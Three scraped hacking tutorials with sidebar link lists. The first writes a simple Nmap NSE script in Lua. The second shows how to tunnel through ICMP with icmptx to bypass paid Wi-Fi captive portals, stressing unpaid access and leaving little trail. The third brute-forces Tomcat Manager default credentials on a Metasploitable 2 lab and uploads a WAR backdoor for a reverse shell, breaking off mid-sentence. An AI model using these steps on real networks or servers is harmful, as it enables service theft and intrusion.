The road to becoming a skilled white hat is paved with many milestones, one of those being learning how to perform a simpleNmapscan. A little further down that road lies more advanced scanning, along with utilizing a powerful feature of Nmap called theNmap Scripting Engine. Even further down the road is learning how to modify and write scripts for NSE, which is what we'll be doing today.Overview of NSEThe Nmap Scripting Engine is one of the most robust, yet underutilized features of Nmap, containing a hugevariety of scriptsto automate tasks beyondport scanningand basic network discovery. Some of these tasks include scripts for vulnerability detection, advanced version detection, malware detection, fuzzing, and even active exploitation.Don't Miss:Top 5 Intrusive Nmap Scripts Hackers & Pentesters Should KnowNmap can take thecommand lineargument-sCto execute a default set of scripts, but doing so can be noisy as some of these scripts are considered pretty intrusive. Users also have the option to specify which script or scripts to run by using the--scriptargument; Individual scripts can be passed as well as whole categories of scripts.One of the greatest aspects of NSE, though, is the ability for users to tweak and modify scripts to better fit their needs, as well as the power to write custom scripts from scratch. All scripts used by NSE are written in an embedded scripting language calledLua.Introduction to LuaLua is an efficient, dynamically typedscripting languagethat is both powerful and lightweight. It is very flexible in that it supports procedural, functional, and object-oriented programming. Lua is meant to be portable, so it can easily be embedded into other applications using a C API, and it can run on nearly all platforms, including Unix, Windows, mobile devices, and embedded microprocessors such as ARM. Lua has been used in many popular applications, including Adobe Photoshop Lightroom and Garry's Mod.Let's go over some basics in order to get a feel for the language. Comments begin with a double-hyphen and run to the end of the line:-- this is a comment in LuaIn the tradition of learning a new programming language, the classic "Hello world!" program can be written like so:print("Hello world!")Global variables do not need to be declared, and unlike some languages, there is no error for accessing a variable that isn't initialized β€” instead, the valuenilwill be returned. Local variables, on the other hand, are assigned using thelocalkeyword:print(a) -- returns nil local b = 5 print(b) -- returns 5Control flow in Lua consists ofifandif...elsestatements for conditionals, andwhile,repeat, andforloops for iteration. Some examples follow:if condition then statement else statement endwhile condition do statement endrepeat statement until conditionfor i = x, y, z do statement endFunctions in Lua operate similarly to other languages, requiring a function name, return statement, and end statement. The following is an example of a simple function that returns the bigger of two numbers:function max(a, b) if (a > b) then bigger = a else bigger = b end return bigger endA complete tutorial on Lua is beyond the scope of this article, but more detailed information can be foundon Lua's site. Now that we have the basics of the language down, we can begin to interact with some NSE scripts.Related Book: "Network Scanning Cookbook: Practical Network Security using Nmap and Nessus 7" by Sairam JettyWriting a Basic ScriptNSE scriptsare made up of three main sections: head, rule, and action.The head section contains mostly meta-data, such as the author, description, category, and other relevant information about the script.The rule section is where conditions are defined that allow the script to execute; This section must contain at least one of the following functions that will determine when the script will run: prerule, hostrule, portrule, or postrule.The action section is where the main functionality of the script takes place. All of the logic and instructions will go in this section.For demonstration purposes, we will compose a simple script that determines if a given port is open and outputs a relevant message. Let's begin with the head. For now, we can put in a short description and leave it at that:-- HEAD -- description = [[ This is a simple script example that determines if a port is open. ]] author = "Null Byte"Next, we can move on to the rule section. Let's define a portrule to determine whether any given port is open or not:-- RULE -- portrule = function(host, port) return port.protocol == "tcp" and port.state == "open" endNow, we can define the actual script logic in the action section. Let's have the script display a message for any give port that is open:-- ACTION -- action = function(host, port) return "This port is open!" endThe entire script should now look something like this:-- HEAD -- description = [[ This is a simple script example that determines if a port is open. ]] author = "Null Byte" -- RULE -- portrule = function(host, port) return port.protocol == "tcp" and port.state == "open" end -- ACTION -- action = function(host, port) return "This port is open!" endFrom here, we should be able to run our script to see if it works. Save the file asexample-script.nseand copy it to the/usr/share/nmap/scriptsdirectory. We can keep it simple and just uselocalhostto test our script against. We also need to pass in a port, so runservice apache2 restartin the terminal to ensure theweb serveris running, and we can now use port80. Finally, let's run the script:nmap --script example-script localhost -p 80 Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-12 13:08 CDT Nmap scan report for localhost (127.0.0.1) Host is up (0.000087s latency). Other addresses for localhost (not scanned): ::1 PORT STATE SERVICE 80/tcp open http |_example-script: This port is open! Nmap done: 1 IP address (1 host up) scanned in 0.30 secondsWe can see that port 80 is open on localhost and the script displays our message. This is merely a rudimentary example of what NSE scripts can actually do, but with the basics down, it makes it easier to modify existing scripts for custom needs or write even more robust scripts from scratch.More NSE ScriptingThe Nmap Scripting Engine is a powerful feature of Nmap used to expand the functionality of the core tool. In this guide, we learned a bit about Lua, the programming language that drives NSE, as well as how to structure and write a simple script for our own use. We have barely scratched the surface of what Nmap scripts can truly do, so I encourage youto dive in and get your hands dirtyso that you may be able to take full advantage of what NSE has to offer.Don't Miss:How to Easily Detect CVEs with Nmap ScriptsFollow Null Byte onTwitter,Flipboard, andYouTubeSign up forNull Byte's weekly newsletterFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image byComfreak/PixabayRelatedHack Like a Pro:Using the Nmap Scripting Engine (NSE) for ReconnaissanceHow To:Easily Detect CVEs with Nmap ScriptsAdvanced Nmap:Top 5 Intrusive Nmap Scripts Hackers & Pentesters Should KnowHow To:Use NMAP 7 to Discover Vulnerabilities, Launch DoS Attacks and More!How To:Enumerate NetBIOS Shares with NBTScan & Nmap Scripting EngineHack Like a Pro:Scripting for the Aspiring Hacker, Part 1 (BASH Basics)How To:Tactical Nmap for Beginner Network ReconnaissanceHack Like a Pro:Scripting for the Aspiring Hacker, Part 2 (Conditional Statements)Hack Like a Pro:How to Scan the Internet for Heartbleed VulnerabilitiesHack Like a Pro:Python Scripting for the Aspiring Hacker, Part 1How To:Perform Network-Based Attacks with an SBC ImplantNews:Banks Around the World Hit with Repeated DDoS Attacks!How To:Identify Web Application Firewalls with Wafw00f & NmapHow To:Hack UnrealIRCd Using Python Socket ProgrammingHow To:Automate Brute-Force Attacks for Nmap ScansDon't Be a Script-Kiddie part2:Building an Auto-Exploiter Bash ScriptDissecting Nmap:Part 1How To:Break into the Lucrative World of Ethical Hacking with This Reasonably Priced Course BundleHow To:Find & Exploit SUID Binaries with SUID3NUMDon't Be a Script-Kiddie part1:Introduction to Shell ScriptHack Like a Pro:Metasploit for the Aspiring Hacker, Part 14 (Creating Resource Script Files)Hack Like a Pro:Perl Scripting for the Aspiring Hacker, Part 2 (Building a Port Scanner)Hack Like a Pro:How to Scan the Globe for Vulnerable Ports & ServicesHacking macOS:How to Spread Trojans & Pivot to Other Mac ComputersHow To:Spider Web Pages with Nmap for SQLi VulnerabilitiesHow To:Use the Nmap security toolHow To:Script Writing Basics How to Structure a Film Script lHacking Reconnaissance:Finding Vulnerabilities in Your Target Using NmapHow To:How Hackers Use Your IP Address to Hack Your Computer & How to Stop ItWeekend Homework:How to Become a Null Byte ContributorNews:Null Byte Is Calling for Contributors!News:The Money Making MacroHow To:Enable Code Syntax Highlighting for Python in the Nano Text EditorHow To:Bash (Shell) Scripting for BeginnersHow To:Start With Site Setting For Snoft Article Directory ScriptForbes Exploited:XSS Vulnerabilities Allow Phishers to Hijack Sessions & Steal LoginsNews:INTRO TO SCREENWRITINGNews:Asteroids
How to Hack Wi-Fi: Evading an Authentication Proxy Using ICMPTX Β« Null Byte :: WonderHowTo
Welcome back, my greenhorn hackers!In previousWi-Fi hacking tutorials, I have shown you ways tocreate an Evil Twin, toDoS a wireless AP, and tocrack WEPandWPA2passwords, but in this tutorial, I will show you something a little bit different.In many restaurants, hotels, airports, airplanes, and cafes, they have open authentication on the wireless AP, but once you connect to the AP, you are sent to a proxy that asks you for your credentials. This is very common in many commercial establishments around the world. To obtain the necessary credentials, there is usually charge associated with it.What if you didn't have a credit card, or forgot your credit card, and needed to access the internet? You still may be able to, if the server accepts ICMP (ping) and you are patient.In addition, imagine a scenario where you need to stealthily retrieve a file, send a message, or retrieve a message, in say, a cyber espionage or cyber warfare situation, while barely leaving a trace of your activity. This may be your method of choice.Note: This is a more advanced technique, so if you are new to hacking, work on some of the more basic techniques before trying this.ICMP: The Internet Control Message ProtocolAs you know, ICMP is a protocol that is used detect the presence of a active host. We can determine if a host is active (pay attention, newbies) by simply typing:kali > ping <IPaddress>There are multiple types of ICMP messages, but this one isecho request(Type 0) andecho reply(Type 8). Although nearly all of us usepingone time or another, keep in mind that there are other types of ICMP that can come in handy when scanning or hacking systems that may block or drop ICMP Type 0.If a server accepts ICMP (many won't as a security precaution), you can use ICMP to bypass the need for authentication via the proxy (that webpage that asks you for credentials). Because it is very slow, I don't recommend this for daily use, but in a pinch, this can be a very innovative way to get your email when you don't want to buy access to the service, orβ€”you want to access the web without leaving a trace.Step 1: Fire Up Kali & Download IcmptxTo begin, let's fire upKali Linuxand downloadicmptx. Since icmptx is in the Kali repository, all we need to do is:kali > apt-get install icmptxThis will install icmptx to your Kali operating system.Step 2: Getting HelpNext, let's take a look at the help file for icmptx. Simply type:kali > icmptxThis help screen will appear. As you can see, the syntax is very straightforward and simple. Unfortunately, the implementation is not.When we downloaded icmptx, it installed a manual page, so let's take a look at it by typing:kali > man icmptxThe manual page doesn't offer much more information than the help page.Step 3: Server Side ProxyThe way icmptx works is that you need to set up a proxy/server between you, the client, and the intended target on the web. First, let's set up the proxy/server.To set up the up the proxy/server, the syntax is simple:kali > icmptx -s 10.0.0.1This points the server/proxy at the IP address 10.0.0.1. This is only an example; you will need to replace this IP with whatever the target IP address you are trying to connect to.Step 4: TunnelingNext, we need to set up a tunnel. A tunnel provides a packet transmission and reception place for user-based applications. Since icmptx is a user-based application, we need to set up a tunnel to send and receive packets, in this case, ICMP packets.We can check to see whether our kernel supports tunneling by typing:kali > ifconfig tun0This response indicates that our Debian operating system (that Kali is built on) supports tunneling. Let's set up a tunnel on the server now.Step 5: IP ForwardingNext, we need to set up this server to first, ignore ICMP requests and second, forward IP traffic. If we didn't tell the kernel to ignore ICMP requests, it would respond with a echo reply (Type 8), which is the normal response. We don't want that. We want the ICMP traffic to enter the server and pass right through it.We can tell the kernel to ignore ICMP traffic by typing:kali > echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_allThen we need to forward IP traffic, by typing:kali > echo 1 > /proc/sys/net/ipv4/ip_forwardStep 6: Set Up the ClientNow, let's set up our client. This is the system we will be using to access the Internet from. We need to install icmptx on this system as well, but here we will be using the client and not the server setup.To do so, type:kali > icmptx -c <IP address of the proxy/server>Then we need to establish a tunnel on this system as well.Next, we need to set up a route to the proxy.Lastly, we need to set a route through the tunnel we created (tun0) to the server on the web we want to access.Now, when you want to access that site on the web, you can do so without authenticating and be almost totally invisible!Although using icmptx is probably not a practical means of accessing the web on a daily basis, in a pinch or under severely clandestine circumstances, it will get you past web-based authentication and leave almost no trail. Few, if any, security administrators will be looking for ICMP traffic to trace your activities and, since you did not have to authenticate, your trail is almost invisible. In addition, if you set up the server on a zombie system, the only trail will lead back to the server/zombie without a highly skilled forensic investigation.For more ways to hack wireless networks, make sure to check outmy Wi-Fi Hacking seriesof guides and, as always, stayed tuned toNull Bytefor more hacking fun.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image viaTSARelatedHow to Hack Wi-Fi:Selecting a Good Wi-Fi Hacking StrategyNews:Project Zero Finds iPhone & Android Open to Bugs in Broadcom's Wi-Fi ChipsHack Like a Pro:How to Hack Web Apps, Part 3 (Web-Based Authentication)Android Basics:How to Connect to a Wi-Fi NetworkHow To:Hack 5 GHz Wi-Fi Networks with an Alfa Wi-Fi AdapterHow To:Having Connection Issues on Android Pie? Turn Off 'Turn on Wi-Fi Automatically'How To:Turn on Google Pixel's Wi-Fi Assistant to Get Secure Access on Open NetworksHow To:Hack WiFi Passwords for Free Wireless Internet on Your PS3How to Hack Wi-Fi:Disabling Security Cameras on Any Wireless Network with Aireplay-NgHow To:This Widget Lets You Open Wi-Fi Settings Faster, Share Passwords & More on Your iPhoneHow To:Skip Ads When Listening to iTunes Radio on Your Mac or iOS DeviceHow to Hack Wi-Fi:Getting Started with the Aircrack-Ng Suite of Wi-Fi Hacking ToolsHow To:Your iPhone's Using More Data Than It Needs, but This Could Stop ItHow To:Share Wi-Fi Adapters Across a Network with Airserv-NgHow to Hack Wi-Fi:Getting Started with Terms & TechnologiesHow To:Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber DuckyHow To:iOS 6 Broke Your Wi-Fi? Here's How to Fix Connection Problems on Your iPhone or iPadHow To:Hack Facebook & Gmail Accounts Owned by MacOS TargetsHow To:This App Saves Battery Life by Toggling Data Off When You're on Wi-FiWiFi Prank:Use the iOS Exploit to Keep iPhone Users Off the InternetHow To:Easily Store Your iPhone's Wi-Fi Passwords & Share Them with Anybody β€” Even Android UsersHow To:Share Your Wi-Fi Password with a QR Code in Android 10How To:Easily See Passwords for Wi-Fi Networks You've Connected Your Android Device ToHow To:See Who's Using Your Wi-Fi & Boot Them Off with Your AndroidNews:What to Expect from Null Byte in 2015How To:Fix the Wi-Fi Roaming Bug on Your Samsung Galaxy S3Hack Like a Pro:How to Hack Web Apps, Part 4 (Hacking Form Authentication with Burp Suite)News:iOS 11.2 Beta 3 Released, Includes Pop-Up Alerts for Wi-Fi & Bluetooth Controls, New Control Center BarHow To:Recover a Lost WiFi Password from Any DeviceHow To:Hide Your IP Address with a Proxy ServerHow to Hack Wi-Fi:DoSing a Wireless AP ContinuouslyHow To:Save Battery Power by Pairing Wi-Fi Connections with Cell Tower Signals on Your Galaxy Note 3How To:Quickly Encrypt Your Web Browsing Traffic When Connected to Public WiFiHow To:Sneak Past Web Filters and Proxy Blockers with Google TranslateHow To:Chain Proxies to Mask Your IP Address and Remain Anonymous on the WebHow To:Hack Wireless Router Passwords & Networks Using HydraHow To:Hack Anyone's Facebook, Twitter or YouTube Account with Your Android DeviceHow To:You No Longer Have to Open Settings to Switch & Connect to Wi-Fi on Your iPhone (FINALLY!)Levitation Challenge:Evading ArrestHow To:Adjust WiFi Video Quality on Your iPhone in iOS 10
How to Hack Apache Tomcat via Malicious WAR File Upload Β« Null Byte :: WonderHowTo
Web applicationsare a prime target for hackers, but sometimes it's not just the web apps themselves that are vulnerable. Web management interfaces should be scrutinized just as hard as the apps they manage, especially when they contain some sort of upload functionality. By exploiting a vulnerability in Apache Tomcat, a hacker can upload a backdoor and get a shell.Apache Tomcat is an open-source implementation of severalJava technologies, including Java Servlet, JSP, Java EL, and WebSocket. What this does is provide an environment where Java code can run overHTTP. It was first released in 1998 and is still developed and maintained today under the Apache License 2.0.Don't Miss:Scan Websites for Interesting Directories & Files with GobusterTomcat uses WAR (Web Application Archive) files to deploy web apps via servlets. These files are similar to JAR files but contain everything the web app needs, such as JavaScript, CSS, etc. Previous versions of Apache Tomcat included a vulnerability that allowed attackers to upload and deploy a WARbackdoor.We will be usingKali Linuxto attack an instance ofMetasploitable 2, an intentionally vulnerable virtual machine, to highlight the Tomcat vulnerability.Target EnumerationWe can begin by performing anNmap scanon the target to verify that Apache Tomcat is running. The-sVswitch will attempt to determine the name and version of any available service:~# nmap -sV 10.10.0.50 Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-06 11:33 CDT Nmap scan report for 10.10.0.50 Host is up (0.0032s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet? 25/tcp open smtp? 53/tcp open domain? 80/tcp open tcpwrapped 111/tcp open rpcbind? 139/tcp open netbios-ssn? 445/tcp open microsoft-ds? 512/tcp open exec? 513/tcp open login? 514/tcp open shell? 1099/tcp open rmiregistry? 1524/tcp open bindshell Metasploitable root shell 2049/tcp open nfs? 2121/tcp open ccproxy-ftp? 3306/tcp open mysql? 5432/tcp open postgresql? 5900/tcp open vnc VNC (protocol 3.3) 6000/tcp open X11? 6667/tcp open irc UnrealIRCd 8009/tcp open ajp13? 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 MAC Address: 00:1D:09:55:B1:3B (Dell) Service Info: Host: irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelWe can see that Tomcat is indeed running on HTTP port 8180.Next, for this exploit to work reliably, we need a valid set of credentials.Metasploithas an auxiliary scanner that will attempt to brute-force Tomcat's Manager application. We can launch Metasploit by typingmsfconsolein theterminal.~# msfconsole [-] ***rting the Metasploit Framework console...- [-] * WARNING: No database support: No database YAML file [-] *** MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM# JMMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm `?MMM MMMM` dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM https://metasploit.com =[ metasploit v5.0.20-dev ] + -- --=[ 1886 exploits - 1065 auxiliary - 328 post ] + -- --=[ 546 payloads - 44 encoders - 10 nops ] + -- --=[ 2 evasion ] msf5 >Use thesearchcommand to find any modules dealing with Apache Tomcat:msf5 > search tomcat Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/http/tomcat_administration normal Yes Tomcat Administration Tool Default Access 1 auxiliary/admin/http/tomcat_utf8_traversal 2009-01-09 normal Yes Tomcat UTF-8 Directory Traversal Vulnerability 2 auxiliary/admin/http/trendmicro_dlp_traversal 2009-01-09 normal Yes TrendMicro Data Loss Prevention 5.5 Directory Traversal 3 auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal No Apache Commons FileUpload and Apache Tomcat DoS 4 auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal No Apache Tomcat Transfer-Encoding Information Disclosure and DoS 5 auxiliary/dos/http/hashcollision_dos 2011-12-28 normal No Hashtable Collisions 6 auxiliary/scanner/http/tomcat_enum normal Yes Apache Tomcat User Enumeration 7 auxiliary/scanner/http/tomcat_mgr_login normal Yes Tomcat Application Manager Login Utility 8 exploit/linux/http/cisco_prime_inf_rce 2018-10-04 excellent Yes Cisco Prime Infrastructure Unauthenticated Remote Code Execution 9 exploit/linux/http/cpi_tararchive_upload 2019-05-15 excellent Yes Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability 10 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection 11 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution 12 exploit/multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution 13 exploit/multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass 14 exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution 15 exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution 16 exploit/multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Yes Novell ZENworks Configuration Management Arbitrary File Upload 17 exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10 excellent Yes Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability 18 post/multi/gather/tomcat_gather normal No Gather Tomcat Credentials 19 post/windows/gather/enum_tomcat normal No Windows Gather Apache Tomcat EnumerationWe will be using thetomcat_mgr_loginmodule, so load it up with theusecommand:msf5 > use auxiliary/scanner/http/tomcat_mgr_loginNow we can take a look at theoptionsto see the available settings:msf5 auxiliary(scanner/http/tomcat_mgr_login) > options Module options (auxiliary/scanner/http/tomcat_mgr_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no The HTTP password to specify for authentication PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 8080 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TARGETURI /manager/html yes URI for Manager login. Default is /manager/html THREADS 1 yes The number of concurrent threads USERNAME no The HTTP username to specify for authentication USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual hostFirst, set the remote hosts option to the IP address of our target:msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.10.0.50 rhosts => 10.10.0.50And since Tomcat is running on port 8180, set the remote port as well:msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180 rport => 8180That should be all we have to do to run this scanner. Typerunto kick it off:msf5 auxiliary(scanner/http/tomcat_mgr_login) > run [!] No active DB -- Credential data will not be saved! [-] 10.10.0.50:8180 - LOGIN FAILED: admin:admin (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: admin:manager (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: admin:role1 (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: admin:root (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: admin:tomcat (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: admin:s3cret (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: admin:vagrant (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: manager:admin (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: manager:manager (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: manager:role1 (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: manager:root (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: manager:tomcat (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: manager:s3cret (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: manager:vagrant (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: role1:admin (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: role1:manager (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: role1:role1 (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: role1:root (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: role1:tomcat (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: role1:s3cret (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: role1:vagrant (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: root:admin (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: root:manager (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: root:role1 (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: root:root (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: root:tomcat (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: root:s3cret (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: root:vagrant (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:admin (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:manager (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:role1 (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:root (Incorrect) [+] 10.10.0.50:8180 - Login Successful: tomcat:tomcat [-] 10.10.0.50:8180 - LOGIN FAILED: both:admin (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: both:manager (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: both:role1 (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: both:root (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: both:tomcat (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: both:s3cret (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: both:vagrant (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: j2deployer:j2deployer (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: cxsdk:kdsxc (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: root:owaspbwa (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: ADMIN:ADMIN (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: xampp:xampp (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: QCC:QLogic66 (Incorrect) [-] 10.10.0.50:8180 - LOGIN FAILED: admin:vagrant (Incorrect) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completedWe can see it attempt to log in using various combinations of defaultusernames and passwords. It looks like one login was successful with the username and password both beingtomcat.Get a Shell with MetasploitNow that we have a valid set of credentials, we can exploit the vulnerability in Tomcat's Manager application. Back in our search results, locate thetomcat_mgr_uploadexploit module, and load it with theusecommand:msf5 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_uploadThen, we can take a look at the current settings:msf5 exploit(multi/http/tomcat_mgr_upload) > options Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Java UniversalWe will want to set the remote hosts option:msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 10.10.0.50 rhosts => 10.10.0.50And the correct remote port:msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8180 rport => 8180We can also set the username at this point:msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat HttpUsername => tomcatAnd the password:msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword tomcat HttpPassword => tomcatWe'll want to use an appropriatepayloadas well. To view the available payloads, use theshowcommand:msf5 exploit(multi/http/tomcat_mgr_upload) > show payloads Compatible Payloads =================== # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 generic/custom normal No Custom Payload 1 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline 2 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline 3 java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline 4 java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline 5 java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager 6 java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager 7 java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager 8 java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager 9 java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager 10 java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager 11 java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline 12 multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures) 13 multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)Thejava/shell_reverse_tcppayload will work in this case. Use thesetcommand to set it as the current payload:msf5 exploit(multi/http/tomcat_mgr_upload) > set payload java/shell_reverse_tcp payload => java/shell_reverse_tcpSince we are using areverse shell, we need to specify our local machine's IP address:msf5 exploit(multi/http/tomcat_mgr_upload) > set lhost 10.10.0.1 lhost => 10.10.0.1And a local port of our choosing:msf5 exploit(multi/http/tomcat_mgr_upload) > set lport 4321 lport => 4321We should be good to go at this point. Simply typerunto launch the exploit:msf5 exploit(multi/http/tomcat_mgr_upload) > run [*] Started reverse TCP handler on 10.10.0.1:4321 [*] Retrieving session ID and CSRF token... [*] Uploading and deploying LUMzvVZI0wSUrt... [*] Executing LUMzvVZI0wSUrt... [*] Command shell session 1 opened (10.10.0.1:4321 -> 10.10.0.50:44738) at 2020-01-06 11:59:06 -0500 [*] Undeploying LUMzvVZI0wSUrt ...We can see that a session 